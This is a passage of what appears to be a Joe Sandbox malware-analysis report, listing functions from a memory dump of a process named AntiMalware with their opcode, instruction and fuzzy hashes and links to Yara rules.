                                                                        • Instruction Fuzzy Hash: A631C321B19A4E0FE798BBBC58697BC7AD1EF98715F0542BAE01DC32D6DD2868414382
                                                                        Function 00007FFD9B7F0949 Relevance: .1, Instructions: 65COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.2624595506.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_7ffd9b7f0000_AntiMalware.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cbab276ddc51ad4a4bf4983e45e443fcba754df11b84c4ce38fba46992dafa09
                                                                        • Instruction ID: f62633b6bb111ca7d56fb9a77774c52f8a0fac13003dda4c56efc7bd8f255b43
                                                                        • Opcode Fuzzy Hash: cbab276ddc51ad4a4bf4983e45e443fcba754df11b84c4ce38fba46992dafa09
                                                                        • Instruction Fuzzy Hash: F811511BA096E94ED702B7B8B8A44EC7B70DE8222A71943F3D1858D0978918508A8795
                                                                        Function 00007FFD9B7F2221 Relevance: .0, Instructions: 47COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.2624595506.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_7ffd9b7f0000_AntiMalware.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1158ebba9a250ae908fb95229cfe8a901218462066a197dc533b9385fddc2675
                                                                        • Instruction ID: 944da8a3891b61108a9efa82f6c0f47b31b42e56afd209e6348b4e83ebacb88e
                                                                        • Opcode Fuzzy Hash: 1158ebba9a250ae908fb95229cfe8a901218462066a197dc533b9385fddc2675
                                                                        • Instruction Fuzzy Hash: E3014755B0EB890EE765A6B81875435BFE0CF91240B4A06FAF888C21F7D8086B4183C6